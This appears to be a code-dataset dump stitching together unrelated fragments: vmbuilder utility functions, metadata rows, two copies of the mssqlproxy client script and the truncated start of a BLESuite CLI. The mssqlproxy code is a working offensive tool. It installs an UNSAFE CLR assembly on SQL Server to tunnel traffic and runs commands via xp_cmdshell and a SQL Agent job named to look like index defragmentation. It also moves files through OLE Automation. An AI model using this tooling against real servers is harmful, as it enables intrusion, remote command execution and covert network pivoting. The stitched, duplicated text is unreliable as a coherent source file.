    while not (mystdout.closed and mystderr.closed):
        # Block until either of them has something to offer
        fds = select.select([x.file for x in [mystdout, mystderr] if not x.closed], [], [])[0]
        for fp in [mystderr, mystdout]:
            if fp.file in fds:
                fp.process_input()
    status = proc.wait()
    if not ignore_fail and status != 0:
        raise VMBuilderException, "Process (%s) returned %d. stdout: %s, stderr: %s" % (args.__repr__(), status, mystdout.buf, mystderr.buf)
    return mystdout.buf
def checkroot():
    """Ensure the process runs with root privileges, raising otherwise."""
    running_as_root = (os.geteuid() == 0)
    if not running_as_root:
        raise VMBuilderUserError("This script must be run as root (e.g. via sudo)")
def render_template(plugin, context, tmplname, extra_context=None):
    """Render template `tmplname` for `plugin`, trying context.template_dirs in order.

    Returns the rendered text of the first template found; raises
    VMBuilderException when no directory contains it.
    """
    # Import here to avoid having to build-dep on python-cheetah
    from Cheetah.Template import Template
    search_list = []
    if context:
        search_list.append(extra_context)
        search_list.append(context)
    # Each entry in template_dirs is a %-pattern parameterised by the plugin.
    template_dirs = [pattern % plugin for pattern in context.template_dirs]
    for directory in template_dirs:
        candidate = '%s/%s.tmpl' % (directory, tmplname)
        if not os.path.exists(candidate):
            continue
        rendered = Template(file=candidate, searchList=search_list).respond()
        logging.debug('Output from template \'%s\': %s' % (candidate, rendered))
        return rendered
    raise VMBuilderException('Template %s.tmpl not found in any of %s' % (tmplname, ', '.join(template_dirs)))
def call_hooks(context, func, *args, **kwargs):
logging.info('Calling hook: %s' % func)
logging.debug('(args=%r, kwargs=%r)' % (args, kwargs))
for plugin in context.plugins:
logging.debug('Calling %s method in %s plugin.' % (func, plugin.__module__))
try:
getattr(plugin, func)(*args, **kwargs)
except AttributeError as e:
logging.debug('No such method ({}) in context plugin ({})'.format(
func, plugin.__module__))
for f in context.hooks.get(func, []):
logging.debug('Calling %r.' % (f,))
f(*args, **kwargs)
logging.debug('Calling %s method in context plugin %s.' % (func, context.__module__))
try:
getattr(context, func)(*args, **kwargs)
except AttributeError as e:
logging.debug('No such method ({}) in context plugin ({})'.format(
func, plugin.__module__))
def tmp_filename(suffix='', tmp_root=None):
    """Return a candidate temporary file name (the file itself is not created).

    There is a risk in using tempfile.mktemp(): it's not recommended
    to run vmbuilder on machines with untrusted users.
    """
    candidate = tempfile.mktemp(suffix=suffix, dir=tmp_root)
    return candidate
def tmpdir(suffix='', tmp_root=None):
    """Create and return a fresh temporary directory under `tmp_root`."""
    return tempfile.mkdtemp(dir=tmp_root, suffix=suffix)
def set_up_tmpfs(tmp_root=None, size=1024):
    """Mount a tmpfs of `size` MB under a fresh directory in `tmp_root`.

    `tmp_root` defaults to tempfile.gettempdir(); the mount point is returned.
    """
    mount_point = tmpdir('tmpfs', tmp_root)
    mount_cmd = ["mount", "-t", "tmpfs", "-o",
                 "size=%dM,mode=0770" % int(size),
                 "tmpfs", mount_point]
    logging.info('Mounting tmpfs under %s' % mount_point)
    logging.debug('Executing: %s' % mount_cmd)
    run_cmd(*mount_cmd)
    return mount_point
def clean_up_tmpfs(mount_point):
    """Unmount the tmpfs storage mounted at `mount_point`."""
    umount_cmd = ["umount", "-t", "tmpfs", mount_point]
    logging.info('Unmounting tmpfs from %s' % mount_point)
    logging.debug('Executing: %s' % umount_cmd)
    run_cmd(*umount_cmd)
def get_conf_value(context, confparser, key):
    """Look up `key`, letting the [context.arg] section override [DEFAULT].

    Returns None when the key is present in neither section.
    """
    value = None
    try:
        value = confparser.get('DEFAULT', key)
    except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
        pass
    # A value in the context-specific section wins over the DEFAULT one.
    if confparser.has_option(context.arg, key):
        value = confparser.get(context.arg, key)
    logging.debug('Returning value %s for configuration key %s' % (repr(value), key))
    return value
def apply_config_files_to_context(config_files, context):
    """Read `config_files` and apply any matching values onto context settings.

    :param config_files: path or list of paths accepted by ConfigParser.read().
    :param context: object whose ``_config`` maps option keys to setting
                    objects exposing ``set_value_fuzzy``.
    """
    confparser = ConfigParser.SafeConfigParser()
    confparser.read(config_files)
    # Python 2 dict API (iteritems); each setting coerces the raw string itself.
    for (key, setting) in context._config.iteritems():
        confvalue = get_conf_value(context, confparser, key)
        if confvalue:
            setting.set_value_fuzzy(confvalue)
| 3,479 | 9 | 268 |
a8f1d9e916607551577ad10de7f094657e42fb01 | 20,490 | py | Python | mssqlclient.py | iptL-F4ck/mssqlproxy | c64bfe4ba05ad1f8e8a608692da94819f6652693 | [
"MIT"
] | null | null | null | mssqlclient.py | iptL-F4ck/mssqlproxy | c64bfe4ba05ad1f8e8a608692da94819f6652693 | [
"MIT"
] | null | null | null | mssqlclient.py | iptL-F4ck/mssqlproxy | c64bfe4ba05ad1f8e8a608692da94819f6652693 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Copyright (c) 2020 BlackArrow
#
#
# This product includes software developed by
# SecureAuth Corporation (https://www.secureauth.com/).
#
# Description: [MS-TDS] & [MC-SQLR] example.
#
# Original author:
# Alberto Solino (beto@coresecurity.com/@agsolino)
#
# Author:
# Pablo Martinez (https://twitter.com/xassiz)
#
from __future__ import division
from __future__ import print_function
import argparse
import sys
import os
import logging
import socket
import threading
import select
from impacket.examples import logger
from impacket import version, tds
# Proxy config
MSG_END_OF_TRANSIMISSION = b"\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
MSG_EXIT_CMD = b"\x12\x34\x56"
MSG_EXIT_ACK = b"\x65\x43\x21"
ASSEMBLY_NAME = "Microsoft.SqlServer.Proxy"
PROCEDURE_NAME = "sp_start_proxy"
# Entry point: parse CLI options, authenticate against the target MSSQL server,
# then either run one proxy action or drop into the interactive SQL shell.
# NOTE(review): this copy references SQLSHELL and the proxy_* handlers, which
# are not defined in this (filtered) copy of the module — confirm upstream.
if __name__ == '__main__':
    import cmd
    # Init the example's logger theme
    logger.init()
    print(version.BANNER)
    print("mssqlproxy - Copyright 2020 BlackArrow")
    parser = argparse.ArgumentParser(add_help = True, description = "TDS client implementation (SSL supported).")
    parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
    parser.add_argument('-port', action='store', default='1433', help='target MSSQL port (default 1433)')
    parser.add_argument('-db', action='store', help='MSSQL database instance (default None)')
    parser.add_argument('-windows-auth', action='store_true', default = 'False', help='whether or not to use Windows '
                        'Authentication (default False)')
    parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
    parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the SQL shell')
    group = parser.add_argument_group('authentication')
    group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
    group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                       '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
                       'ones specified in the command line')
    group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                       '(128 or 256 bits)')
    group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
                       'ommited it use the domain part (FQDN) specified in the target parameter')
    # Proxy mode arguments
    group = parser.add_argument_group('proxy mode')
    group.add_argument('-reciclador', action="store", metavar = "path", help='Remote path where DLL is stored in server')
    group.add_argument('-install', action="store_true", help='Installs CLR assembly')
    group.add_argument('-uninstall', action="store_true", help='Uninstalls CLR assembly')
    group.add_argument('-check', action="store_true", help='Checks if CLR is ready')
    group.add_argument('-start', action="store_true", help='Starts proxy')
    group.add_argument('-local-port', action="store", metavar = "port", type=int, default=1337, help='Local port to listen on')
    group.add_argument('-clr', action="store", metavar="local_path", help='Local CLR path')
    group.add_argument('-no-check-src-port', action="store_true", help='Use this option when connection is not direct (e.g. proxy)')
    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    options = parser.parse_args()
    if options.debug is True:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(logging.INFO)
    import re
    # Split target into domain / user / password / host.
    domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
        options.target).groups('')
    #In case the password contains '@'
    if '@' in address:
        password = password + '@' + address.rpartition('@')[0]
        address = address.rpartition('@')[2]
    if domain is None:
        domain = ''
    # Prompt only when no password, hash, Kerberos key or -no-pass was given.
    if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
        from getpass import getpass
        password = getpass("Password:")
    if options.aesKey is not None:
        options.k = True
    # If proxy params
    if any(getattr(options, l) for l in ['reciclador', 'install', 'uninstall', 'check', 'start', 'clr']):
        proxy_mode = True
        # Exactly one proxy action must be selected.
        if sum((options.install, options.uninstall, options.check, options.start)) != 1:
            logging.error("please, choose one of the following actions: install, uninstall, check, start")
            sys.exit(1)
        if (options.start or options.check) and not options.reciclador:
            logging.error("reciclador path is mandatory")
            sys.exit(1)
        if options.install and not options.clr:
            logging.error("CLR path is mandatory")
            sys.exit(1)
    else:
        proxy_mode = False
    ms_sql = tds.MSSQL(address, int(options.port))
    ms_sql.connect()
    try:
        if options.k is True:
            res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,
                                       kdcHost=options.dc_ip)
        else:
            res = ms_sql.login(options.db, username, password, domain, options.hashes, options.windows_auth)
        ms_sql.printReplies()
    except Exception as e:
        logging.debug("Exception:", exc_info=True)
        logging.error(str(e))
        res = False
    if res is True:
        # If proxy mode
        if proxy_mode:
            # Dispatch table: option name -> handler function.
            proxy_opt = {
                'install' : proxy_install,
                'uninstall': proxy_uninstall,
                'check' : proxy_check,
                'start' : proxy_start
            }
            opt = next(mode for mode in proxy_opt.keys() if getattr(options, mode))
            proxy_opt[opt](ms_sql, options)
        # Shell mode
        else:
            shell = SQLSHELL(ms_sql)
            if options.file is None:
                shell.cmdloop()
            else:
                for line in options.file.readlines():
                    print("SQL> %s" % line, end=' ')
                    shell.onecmd(line)
    ms_sql.disconnect()
| 37.052441 | 158 | 0.551147 | #!/usr/bin/env python
#
# Copyright (c) 2020 BlackArrow
#
#
# This product includes software developed by
# SecureAuth Corporation (https://www.secureauth.com/).
#
# Description: [MS-TDS] & [MC-SQLR] example.
#
# Original author:
# Alberto Solino (beto@coresecurity.com/@agsolino)
#
# Author:
# Pablo Martinez (https://twitter.com/xassiz)
#
from __future__ import division
from __future__ import print_function
import argparse
import sys
import os
import logging
import socket
import threading
import select
from impacket.examples import logger
from impacket import version, tds
# Proxy config
MSG_END_OF_TRANSIMISSION = b"\x31\x41\x59\x26\x53\x58\x97\x93\x23\x84"
MSG_EXIT_CMD = b"\x12\x34\x56"
MSG_EXIT_ACK = b"\x65\x43\x21"
ASSEMBLY_NAME = "Microsoft.SqlServer.Proxy"
PROCEDURE_NAME = "sp_start_proxy"
def set_configuration(mssql, option, value):
    """Apply an sp_configure option on the server and verify it took effect."""
    query = "exec master.dbo.sp_configure '%s',%d; RECONFIGURE;" % (option, value)
    mssql.batch(query)
    return check_configuration(mssql, option, value)
def check_configuration(mssql, option, value):
    """Return True when the server's sp_configure `option` currently equals `value`."""
    query = "SELECT cast(value as INT) as v FROM sys.configurations where name = '%s'" % option
    try:
        rows = mssql.batch(query)
        return rows[0]['v'] == value
    except:
        # Any query/parse failure counts as "not configured as requested".
        return False
def file_exists(mssql, path):
    """Return True when `path` exists on the server (via xp_fileexist)."""
    query = "DECLARE @r INT; EXEC master.dbo.xp_fileexist '%s', @r OUTPUT; SELECT @r as n" % path
    try:
        rows = mssql.batch(query)
        return rows[0]['n'] == 1
    except:
        # Query failure is treated as "file not found".
        return False
def proxy_install(mssql, args):
    """Enable CLR on the server and install the proxy assembly + procedure.

    Reads the local CLR DLL from args.clr, uploads it as a hex literal, then
    creates the stored procedure bound to the assembly's entry point.
    """
    logging.info("Proxy mode: install")
    if set_configuration(mssql, 'show advanced options', 1) == False:
        logging.error("Cannot enable 'show advanced options'")
        return
    if set_configuration(mssql, 'clr enabled', 1) == False:
        logging.error("Cannot enable CLR")
        return
    else:
        logging.info("CLR enabled")
    # Embed the DLL bytes as a hex literal in the CREATE ASSEMBLY statement.
    with open(args.clr, 'rb') as f:
        data = f.read().hex()
    mssql.batch("USE msdb; CREATE ASSEMBLY [%s] FROM 0x%s WITH PERMISSION_SET = UNSAFE" % (ASSEMBLY_NAME, data))
    # Verify the assembly registered before creating the procedure.
    res = mssql.batch("USE msdb; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s'" % ASSEMBLY_NAME)[0]['n']
    if res == 1:
        logging.info("Assembly successfully installed")
        mssql.batch("CREATE PROCEDURE [dbo].[%s]"
                    " @path NVARCHAR (4000), @client_addr NVARCHAR (4000), @client_port INTEGER"
                    " AS EXTERNAL NAME [%s].[StoredProcedures].[sp_start_proxy]" % (PROCEDURE_NAME, ASSEMBLY_NAME))
        res = mssql.batch("SELECT COUNT(*) AS n FROM sys.procedures where name = '%s'" % PROCEDURE_NAME)[0]['n']
        if res == 1:
            logging.info("Procedure successfully installed")
        else:
            logging.error("Cannot install procedure")
    else:
        logging.error("Cannot install assembly")
def proxy_uninstall(mssql, args):
    """Drop the proxy procedure and assembly, then disable CLR again.

    Each DROP is immediately followed by a COUNT query in the same batch so
    the result (0 remaining) confirms the removal.
    """
    logging.info("Proxy mode: uninstall")
    res = mssql.batch("USE msdb; DROP PROCEDURE [%s]; SELECT COUNT(*) AS n FROM sys.procedures where name = '%s' " % (PROCEDURE_NAME, PROCEDURE_NAME))[0]['n']
    if res == 0:
        logging.info("Procedure successfully uninstalled")
    else:
        logging.error("Cannot uninstall procedure")
    res = mssql.batch("DROP ASSEMBLY [%s]; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s' " % (ASSEMBLY_NAME, ASSEMBLY_NAME))[0]['n']
    if res == 0:
        logging.info("Assembly successfully uninstalled")
    else:
        logging.error("Cannot uninstall assembly")
    # Restore the server configuration: turn CLR back off.
    if set_configuration(mssql, 'show advanced options', 1) == False:
        logging.error("Cannot enable 'show advanced options'")
    else:
        if set_configuration(mssql, 'clr enabled', 0) == False:
            logging.error("Cannot disable CLR")
        else:
            logging.info("CLR disabled")
def proxy_check(mssql, args):
    """Verify the assembly, procedure, remote DLL and CLR config are all in place.

    Logs the state of each prerequisite and returns True only when every
    check passes.
    """
    ok = True
    logging.info("Proxy mode: check")
    count = mssql.batch("USE msdb; SELECT COUNT(*) AS n FROM sys.assemblies where name = '%s'" % ASSEMBLY_NAME)[0]['n']
    if count != 1:
        ok = False
        logging.error("Assembly not found")
    else:
        logging.info("Assembly is installed")
    count = mssql.batch("SELECT COUNT(*) AS n FROM sys.procedures where name = '%s'" % PROCEDURE_NAME)[0]['n']
    if count != 1:
        ok = False
        logging.error("Procedure not found")
    else:
        logging.info("Procedure is installed")
    if not file_exists(mssql, args.reciclador):
        ok = False
        logging.error("reciclador not found")
    else:
        logging.info("reciclador is installed")
    if not check_configuration(mssql, 'clr enabled', 1):
        ok = False
        logging.error("clr disabled")
    else:
        logging.info("clr enabled")
    return ok
def proxy_worker(server, client):
    """Shuttle bytes between a local `client` socket and the `server` socket.

    Runs until either side disconnects. When the client drops, the special
    end-of-transmission marker is sent to the server so the remote side knows
    this stream is done.
    """
    logging.info("New connection")
    client.setblocking(0)
    while True:
        # Wait (up to 60s) for data on either socket.
        readable, writable, errfds = select.select([client, server], [], [], 60)
        for sock in readable:
            if sock is client:
                data = client.recv(2048)
                if len(data) == 0:
                    # Zero-byte recv on a readable socket means peer closed.
                    logging.info("Client disconnected!")
                    logging.debug("Sending end-of-tranmission")
                    server.sendall(MSG_END_OF_TRANSIMISSION)
                    return
                logging.debug("Client: %s" % data.hex())
                server.sendall(data)
            elif sock is server:
                data = server.recv(2048)
                if len(data) == 0:
                    logging.info("Server disconnected!")
                    return
                logging.debug("Server: %s" % data.hex())
                client.sendall(data)
def proxy_start(mssql, args):
    """Launch the remote proxy procedure and serve local clients through it.

    After a successful proxy_check, invokes the remote stored procedure with
    our connection's source address/port, waits for the remote banner as an
    ACK, then accepts local connections and hands each to a proxy_worker
    thread sharing the MSSQL socket. Any failure (or Ctrl-C) sends the exit
    command to the remote side before returning.
    """
    if not proxy_check(mssql, args):
        return
    logging.info("Proxy mode: start")
    laddr, lport = mssql.socket.getsockname()
    if args.no_check_src_port:
        # Source port can't be trusted through an intermediary; 0 disables the check.
        lport = 0
        logging.info("Connection is not direct")
    else:
        logging.debug("Local addr = %s:%d" % (laddr, lport))
    local_port = getattr(args, 'local_port')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.bind(("0.0.0.0", local_port))
    except Exception as err:
        logging.error("Error: '%s'" % err)
        return
    logging.info("Listening on port %d..." % local_port)
    try:
        # Start the remote proxy; wait=False keeps our TDS socket free for raw traffic.
        mssql.batch("DECLARE @ip varchar(15); SET @ip=TRIM(CONVERT(char(15), CONNECTIONPROPERTY('client_net_address')));"
                    "EXEC msdb.dbo.%s '%s', @ip, %d" % (PROCEDURE_NAME, args.reciclador, lport), tuplemode=False, wait=False)
        data = mssql.socket.recv(2048)
        if b'Powered by blackarrow.net' in data:
            logging.info("ACK from server!")
            mssql.socket.sendall(b"ACK")
        else:
            logging.error("cannot establish connection")
            raise Exception('cannot establish connection')
        s.listen(10)
        while True:
            client, _ = s.accept()
            t = threading.Thread(target=proxy_worker, args=(mssql.socket, client))
            t.start()
    except:
        # Cleanup path (error or KeyboardInterrupt): tell the remote proxy to exit.
        mssql.socket.sendall(MSG_EXIT_CMD)
        ack = mssql.socket.recv(1024)
        if MSG_EXIT_ACK in ack:
            logging.info("Bye!")
        else:
            logging.error("Server did not ack :(")
        return
if __name__ == '__main__':
import cmd
    class SQLSHELL(cmd.Cmd):
        """Interactive SQL shell over an authenticated tds.MSSQL connection.

        Unrecognised input is executed as raw SQL; the extra do_* commands
        wrap well-known MSSQL primitives (xp_cmdshell, OLE automation
        upload/download, SQL Agent jobs).
        """
        def __init__(self, SQL):
            cmd.Cmd.__init__(self)
            # Live, already-authenticated tds.MSSQL connection.
            self.sql = SQL
            self.prompt = 'SQL> '
            self.intro = '[!] Press help for extra shell commands'
        def do_help(self, line):
            # Overrides cmd.Cmd's docstring-driven help with a fixed menu.
            print("""
 lcd {path} - changes the current local directory to {path}
 exit - terminates the server process (and this session)
 enable_xp_cmdshell - you know what it means
 disable_xp_cmdshell - you know what it means
 xp_cmdshell {cmd} - executes cmd using xp_cmdshell
 sp_start_job {cmd} - executes cmd using the sql server agent (blind)
 ! {cmd} - executes a local shell cmd
 download {remote} {local} - download a remote file to a local path
 upload {local} {remote} - upload a local file to a remote path (OLE required)
 enable_ole - you know what it means
 disable_ole - you know what it means
 """)
        def do_download(self, params):
            # Fetch a remote file via OPENROWSET BULK and write it locally.
            try:
                remote, local = params.split(' ')
            except:
                logging.error("download: invalid params")
                return
            print("[+] Downloading '%s' to '%s'..." % (remote, local))
            try:
                self.sql.sql_query("SELECT * FROM OPENROWSET(BULK N'%s', SINGLE_BLOB) rs" % remote)
                # The blob comes back hex-encoded in the BulkColumn field.
                data = self.sql.rows[0]['BulkColumn']
                with open(local, 'wb') as f:
                    f.write(bytes.fromhex(data.decode()))
                print("[+] Download completed")
            except Exception as e:
                print(str(e))
        def do_upload(self, params):
            # Push a local file to the server through OLE Automation (ADODB.Stream).
            try:
                local, remote = params.split(' ')
            except:
                logging.error("upload: invalid params")
                return
            # OLE must be enabled first; bail out if enabling it fails.
            if check_configuration(self.sql, 'Ole Automation Procedures', 0):
                if self.do_enable_ole(None) == False:
                    return
            print("[+] Uploading '%s' to '%s'..." % (local, remote))
            try:
                with open(local, 'rb') as f:
                    data = f.read()
                print("[+] Size is %d bytes" % len(data))
                hexdata = "0x%s" % data.hex()
                self.sql.sql_query("DECLARE @ob INT;"
                                   "EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;"
                                   "EXEC sp_OASetProperty @ob, 'Type', 1;"
                                   "EXEC sp_OAMethod @ob, 'Open';"
                                   "EXEC sp_OAMethod @ob, 'Write', NULL, %s;"
                                   "EXEC sp_OAMethod @ob, 'SaveToFile', NULL, '%s', 2;"
                                   "EXEC sp_OAMethod @ob, 'Close';"
                                   "EXEC sp_OADestroy @ob;" % (hexdata, remote))
                if file_exists(self.sql, remote):
                    print("[+] Upload completed")
                else:
                    print("[-] Error uploading - writable?")
            except Exception as e:
                print("[-] Error - " + str(e))
        def do_enable_ole(self, line):
            # Enable 'Ole Automation Procedures'; returns False on failure.
            try:
                if set_configuration(self.sql, 'show advanced options', 1) == False:
                    logging.error("cannot enable 'show advanced options'")
                    return False
                if set_configuration(self.sql, 'Ole Automation Procedures', 1) == False:
                    logging.error("cannot enable 'Ole Automation Procedures'")
                    return False
            except:
                return True
        def do_disable_ole(self, line):
            # Disable 'Ole Automation Procedures'; returns False on failure.
            try:
                if set_configuration(self.sql, 'show advanced options', 1) == False:
                    logging.error("cannot enable 'show advanced options'")
                    return False
                if set_configuration(self.sql, 'Ole Automation Procedures', 0) == False:
                    logging.error("cannot disable 'Ole Automation Procedures'")
                    return False
            except:
                return True
        def do_shell(self, s):
            # '!' prefix: run a command in the local shell.
            os.system(s)
        def do_xp_cmdshell(self, s):
            # Run a remote command via xp_cmdshell, printing each output row.
            try:
                self.sql.sql_query("exec master..xp_cmdshell '%s'--sp_password" % s.replace("'", "''"))
                self.sql.printReplies()
                # Widen the output column so long lines are not truncated.
                self.sql.colMeta[0]['TypeData'] = 80*2
                for row in self.sql.rows:
                    for col in self.sql.colMeta:
                        if row[col['Name']] == 'NULL':
                            print('')
                        else:
                            print(row[col['Name']])
                # self.sql.printRows()
            except:
                pass
        def sp_start_job(self, s):
            # Blind command execution via a throwaway SQL Server Agent job.
            try:
                self.sql.sql_query("DECLARE @job NVARCHAR(100);"
                                   "SET @job='IdxDefrag'+CONVERT(NVARCHAR(36),NEWID());"
                                   "EXEC msdb..sp_add_job @job_name=@job,@description='INDEXDEFRAG',"
                                   "@owner_login_name='sa',@delete_level=3;"
                                   "EXEC msdb..sp_add_jobstep @job_name=@job,@step_id=1,@step_name='Defragmentation',"
                                   "@subsystem='CMDEXEC',@command='%s',@on_success_action=1;"
                                   "EXEC msdb..sp_add_jobserver @job_name=@job;"
                                   "EXEC msdb..sp_start_job @job_name=@job;" % s)
                self.sql.printReplies()
                self.sql.printRows()
            except:
                pass
        def do_lcd(self, s):
            # Change (or print) the local working directory.
            if s == '':
                print(os.getcwd())
            else:
                os.chdir(s)
        def do_enable_xp_cmdshell(self, line):
            try:
                self.sql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;"
                                   "exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
                self.sql.printReplies()
                self.sql.printRows()
            except:
                pass
        def do_disable_xp_cmdshell(self, line):
            try:
                self.sql.sql_query("exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure "
                                   "'show advanced options', 0 ;RECONFIGURE;")
                self.sql.printReplies()
                self.sql.printRows()
            except:
                pass
        def default(self, line):
            # Anything not matching a do_* command is executed as raw SQL.
            try:
                self.sql.sql_query(line)
                self.sql.printReplies()
                self.sql.printRows()
            except:
                pass
        def emptyline(self):
            # Do nothing on an empty line (default would repeat the last command).
            pass
        def do_exit(self, line):
            # Returning True terminates cmd.Cmd.cmdloop().
            return True
# Init the example's logger theme
logger.init()
print(version.BANNER)
print("mssqlproxy - Copyright 2020 BlackArrow")
# Command-line interface: connection target plus MSSQL / proxy-mode options.
parser = argparse.ArgumentParser(add_help = True, description = "TDS client implementation (SSL supported).")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-port', action='store', default='1433', help='target MSSQL port (default 1433)')
parser.add_argument('-db', action='store', help='MSSQL database instance (default None)')
# NOTE(review): store_true combined with default='False' (a *string*) -- when the
# flag is absent, options.windows_auth is the truthy string 'False', not the
# boolean False.  Downstream code should be checked for how it consumes this.
parser.add_argument('-windows-auth', action='store_true', default = 'False', help='whether or not to use Windows '
                    'Authentication (default False)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the SQL shell')
# Credential / authentication options.
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
                   '(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
                   'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
                   '(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
                   'ommited it use the domain part (FQDN) specified in the target parameter')
# Proxy mode arguments
group = parser.add_argument_group('proxy mode')
group.add_argument('-reciclador', action="store", metavar = "path", help='Remote path where DLL is stored in server')
group.add_argument('-install', action="store_true", help='Installs CLR assembly')
group.add_argument('-uninstall', action="store_true", help='Uninstalls CLR assembly')
group.add_argument('-check', action="store_true", help='Checks if CLR is ready')
group.add_argument('-start', action="store_true", help='Starts proxy')
group.add_argument('-local-port', action="store", metavar = "port", type=int, default=1337, help='Local port to listen on')
group.add_argument('-clr', action="store", metavar="local_path", help='Local CLR path')
group.add_argument('-no-check-src-port', action="store_true", help='Use this option when connection is not direct (e.g. proxy)')
# No arguments at all: show usage and bail out.
if len(sys.argv)==1:
    parser.print_help()
    sys.exit(1)
options = parser.parse_args()
if options.debug is True:
    logging.getLogger().setLevel(logging.DEBUG)
else:
    logging.getLogger().setLevel(logging.INFO)
import re
# Split "domain/user:pass@host" into its four parts; groups('') replaces any
# missing optional group with the empty string.
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
    options.target).groups('')
#In case the password contains '@'
if '@' in address:
    password = password + '@' + address.rpartition('@')[0]
    address = address.rpartition('@')[2]
if domain is None:
    domain = ''
# Prompt interactively only when a username was given with no password, no
# hashes, no AES key and -no-pass was not requested.
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
    from getpass import getpass
    password = getpass("Password:")
if options.aesKey is not None:
    options.k = True  # supplying an AES key implies Kerberos authentication
# If proxy params
if any(getattr(options, l) for l in ['reciclador', 'install', 'uninstall', 'check', 'start', 'clr']):
    proxy_mode = True
    # Exactly one of the four action flags must be chosen.
    if sum((options.install, options.uninstall, options.check, options.start)) != 1:
        logging.error("please, choose one of the following actions: install, uninstall, check, start")
        sys.exit(1)
    if (options.start or options.check) and not options.reciclador:
        logging.error("reciclador path is mandatory")
        sys.exit(1)
    if options.install and not options.clr:
        logging.error("CLR path is mandatory")
        sys.exit(1)
else:
    proxy_mode = False
# Connect and authenticate (Kerberos when -k/-aesKey, NTLM/SQL auth otherwise).
ms_sql = tds.MSSQL(address, int(options.port))
ms_sql.connect()
try:
    if options.k is True:
        res = ms_sql.kerberosLogin(options.db, username, password, domain, options.hashes, options.aesKey,
                                   kdcHost=options.dc_ip)
    else:
        res = ms_sql.login(options.db, username, password, domain, options.hashes, options.windows_auth)
    ms_sql.printReplies()
except Exception as e:
    logging.debug("Exception:", exc_info=True)
    logging.error(str(e))
    res = False
if res is True:
    # If proxy mode
    if proxy_mode:
        # Dispatch table: exactly one of these flags is set (validated above).
        proxy_opt = {
            'install' : proxy_install,
            'uninstall': proxy_uninstall,
            'check' : proxy_check,
            'start' : proxy_start
        }
        opt = next(mode for mode in proxy_opt.keys() if getattr(options, mode))
        proxy_opt[opt](ms_sql, options)
    # Shell mode
    else:
        shell = SQLSHELL(ms_sql)
        if options.file is None:
            shell.cmdloop()
        else:
            # Batch mode: replay each line of the input file through the shell.
            for line in options.file.readlines():
                print("SQL> %s" % line, end=' ')
                shell.onecmd(line)
    ms_sql.disconnect()
| 13,115 | 3 | 675 |
400ff23eea96eef52d15f5da1e54e1282902b729 | 19,636 | py | Python | blesuite/cli/blesuite_cli.py | jreynders/BLESuite-1 | 1c3c15fc2d4e30c3f9c1a15e0268cae84685784b | [
"MIT"
] | 198 | 2016-08-04T05:45:38.000Z | 2022-02-17T08:30:58.000Z | blesuite/cli/blesuite_cli.py | jreynders/BLESuite-1 | 1c3c15fc2d4e30c3f9c1a15e0268cae84685784b | [
"MIT"
] | 13 | 2018-02-04T14:16:16.000Z | 2020-10-09T02:16:24.000Z | blesuite/cli/blesuite_cli.py | jreynders/BLESuite-1 | 1c3c15fc2d4e30c3f9c1a15e0268cae84685784b | [
"MIT"
] | 57 | 2016-08-08T04:24:04.000Z | 2022-01-24T08:43:02.000Z | import argparse
from blesuite.connection_manager import BLEConnectionManager
from blesuite_wrapper import ble_service_read, ble_service_read_async, ble_service_write, \
ble_handle_subscribe, ble_service_scan, ble_service_write_async, ble_run_smart_scan
from blesuite import utils
from blesuite.utils.print_helper import print_data_and_hex
from blesuite.utils import validators
import logging
__version__ = "2.0"
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
def parse_command():
    """
    Creates parser and parses command line tool call.

    NOTE(review): this module is Python 2 code (``cmd_choices.iteritems()``
    below, ``print`` statements elsewhere in the file).  The ``--async`` flag
    produces an ``args.async`` attribute, whose name collides with the
    ``async`` keyword from Python 3.7 onward.  The "Bluetooh"/"handel" typos
    in the user-facing help text are left as-is here.

    :return: parsed arguments (an argparse.Namespace)
    """
    global __version__
    #Dictionary of available commands. Place new commands here
    cmd_choices = {'scan': "Scan for BTLE devices",
                   'smartscan': "Scan specified BTLE device for device information, services, characteristics "
